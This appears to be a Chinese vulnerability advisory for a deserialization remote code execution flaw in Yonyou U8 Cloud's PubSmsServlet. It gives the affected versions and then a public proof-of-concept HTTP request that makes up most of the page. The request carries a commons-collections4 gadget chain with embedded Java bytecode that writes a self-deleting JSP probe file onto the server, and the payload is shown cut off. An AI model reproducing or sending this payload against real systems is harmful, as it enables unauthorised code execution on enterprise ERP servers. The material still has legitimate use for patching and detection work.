用友 U8 Cloud pubsmsservlet 代码执行漏洞

日期: 2025-10-16 | 影响软件: 用友U8 Cloud | POC: 已公开

漏洞描述

用友 U8 Cloud 是一种基于企业互联网理念设计的云 ERP 整体解决方案,集成了人力资源、财务会计、物流库存、客户关系和生产制造等功能,旨在推动企业实现敏捷经营、轻量化管理和简化IT操作,并提供安全可信、合规可靠的服务。用友 U8 Cloud 存在命令执行漏洞, 该漏洞源于 PubSmsServlet 在处理 XML 数据时,缺乏有效的类型验证和反序列化安全控制,导致攻击者可构造恶意数据实现任意对象创建从而获取系统权限。影响版本:用友 U8 Cloud 2.0 2.1 2.3 2.5 2.6 2.7 2.65 3.0 3.1 3.2 3.5 3.6 3.6sp 5.0 5.0sp 5.1 5.1sp

PoC代码

POST /service/pubsmsservlet HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 5570
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3.1 Safari/605.1.15

<org.apache.commons.collections4.bag.TreeBag serialization="custom">
  <org.apache.commons.collections4.bag.TreeBag>
    <default/>
    <org.apache.commons.collections4.comparators.TransformingComparator>
      <decorated class="org.apache.commons.collections4.comparators.ComparableComparator"/>
      <transformer class="org.apache.commons.collections4.functors.ChainedTransformer">
        <iTransformers>
          <org.apache.commons.collections4.functors.ConstantTransformer>
            <iConstant class="java-class">com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter</iConstant>
          </org.apache.commons.collections4.functors.ConstantTransformer>
          <org.apache.commons.collections4.functors.InstantiateTransformer>
            <iParamTypes>
              <java-class>javax.xml.transform.Templates</java-class>
            </iParamTypes>
            <iArgs>
              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
                <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
                  <default>
                    <__name>xcodes</__name>
                    <__bytecodes>
                      <byte-array>yv66vgAAADQAcwoAHQAyBwAzCAA0CgA1ADYJADcAOAgAOQoAOgA7CAA8BwA9CgAJADIKAD4APwoACQBACgAJAEEKAAkAQgoAQwBECgBFAEYJADcARwoAPgBICABJCABKBwBLCgAVAEwHAE0KABcATgoAFwBPCgAXAEgKABUASAcAUAcAUQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwBSAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQANU3RhY2tNYXBUYWJsZQcAUwcAPQcAVAcAVQEACDxjbGluaXQ+BwBQAQAKU291cmNlRmlsZQEAFnB1YnNtc3NlcnZsZXRfZXhwLmphdmEMAB4AHwEAEXB1YnNtc3NlcnZsZXRfZXhwAQAYL3B1YnNtc3NlcnZsZXRfZXhwLmNsYXNzBwBWDABXAFgHAFkMAFoAWwEAR+mUmeivrzog5peg5rOV5LuOIGNsYXNzcGF0aCDkuK3mib7liLAgcHVic21zc2VydmxldF9leHAuY2xhc3Mg5paH5Lu244CCBwBcDABdAF4BAF/or7fnoa7kv50gcHVic21zc2VydmxldF9leHAuY2xhc3Mg5bey57yW6K+R77yM5bm25LiU5Zyo6L+Q6KGMIEpBUiDml7YgY2xhc3NwYXRoIOiuvue9ruato+ehruOAggEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwBTDABfAGAMAGEAYgwAYwAfDABkAGUHAGYMAGcAagcAawwAbABtDABuAFsMAG8AHwEAJEQ6XFU4Q0VSUFx3ZWJhcHBzXHU4Y193ZWJcZXJyb3IxLmpzcAECDTwlQCBwYWdlIGNvbnRlbnRUeXBlPSJ0ZXh0L2h0bWw7Y2hhcnNldD1nYjIzMTIiICU+IDxodG1sPiA8aGVhZD4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iemgtY24iPiA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1nYjIzMTIiPiA8dGl0bGU+TkM8L3RpdGxlPiA8L2hlYWQ+IDxib2R5PiA8ZGl2IGFsaWduPSJjZW50ZXIiPiDmirHmrYnvvIzlj5HnlJ/plJnor6/vvIFpZDogPCVvdXQucHJpbnRsbihqYXZhLnV0aWwuVVVJRC5yYW5kb21VVUlEKCkudG9TdHJpbmcoKSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPiA8L2Rpdj4gPGRpdiBhbGlnbj0iY2VudGVyIj4gPGZvbnQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmQiIGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0Ij48L2ZvbnQ+PC9kaXY+IDwvYm9keT4gPC9odG1sPgEAEmphdmEvaW8vRmlsZVdyaXRlcgwAHgBwAQATamF2YS9pby9QcmludFdyaXRlcgwAHgBxDAByAF4BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvaW8vSW5wdXRTdHJlYW0BAAJbQgEAE1tMamF2YS9sYW5nL1N0cmluZzsBAA9qYXZhL2xhbmcvQ2xhc3MBABNnZXRSZXNvdXJjZUFzU3RyZWFtAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9pby9JbnB1dFN0cmVhbTsBABBqYXZhL2xhbmcvU3lzdGVtAQADZXJyAQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARyZWFkAQAHKFtCSUkpSQEABXdyaXRlAQAHKFtCSUkpVgEABWZsdXNoAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAA291dAEABWNsb3NlAQAWKExqYXZhL2xhbmcvU3RyaW5nO1opVgEAEyhMamF2YS9pby9Xcml0ZXI7KVYBAAVwcmludAAhAAIAHQAAAAAABQABAB4AHwABACAAAAAdAAEAAQAAAAUqtwABsQAAAAEAIQAAAAYAAQAAAAwAAQAiACMAAgAgAAAAGQAAAAMAAAABsQAAAAEAIQAAAAYAAQAAACQAJAAAAAQAAQAlAAEAIgAmAAIAIAAAABkAAAAEAAAAAbEAAAABACEAAAAGAAEAAAApACQAAAAEAAEAJQAJACcAKAACACAAAADkAAQABwAAAGgSAhIDtgAETCvHABSyAAUSBrYAB7IABRIItgAHsbsACVm3AApNEQQAvAg6BCsZBAMZBL62AAtZPgKfAA4sGQQDHbYADKf/6Cy2AA0stgAOOgW4AA8ZBbYAEDoGsgARGQa2AAcrtgASsQAAAAIAIQAAAD4ADwAAAC0ACAAvAAwAMAAUADEAHAAyAB0ANgAlADgALAA5ADwAOgBHADwASwA9AFEAQABbAEEAYwBCAGcAQwApAAAAJgAD/AAdBwAq/gAOBwArAAcALP8AGgAFBwAtBwAqBwArAQcALAAAACQAAAAEAAEAHAAIAC4AHwABACAAAAB8AAQABAAAACsSE0sSFEy7ABVZKgO3ABZNuwAXWSy3ABhOLSu2ABkttgAaLLYAG6cABEuxAAEAAAAmACkAHAACACEAAAAqAAoAAAARAAMAEgAGABQAEAAVABkAFgAeABcAIgAYACYAHQApABoAKgAeACkAAAAHAAJpBwAvAAACADAAAAACADEAaQAAAAoAAQBFAEMAaAAJ</byte-array>
                    </__bytecodes>
      ...[已截断]

相关漏洞推荐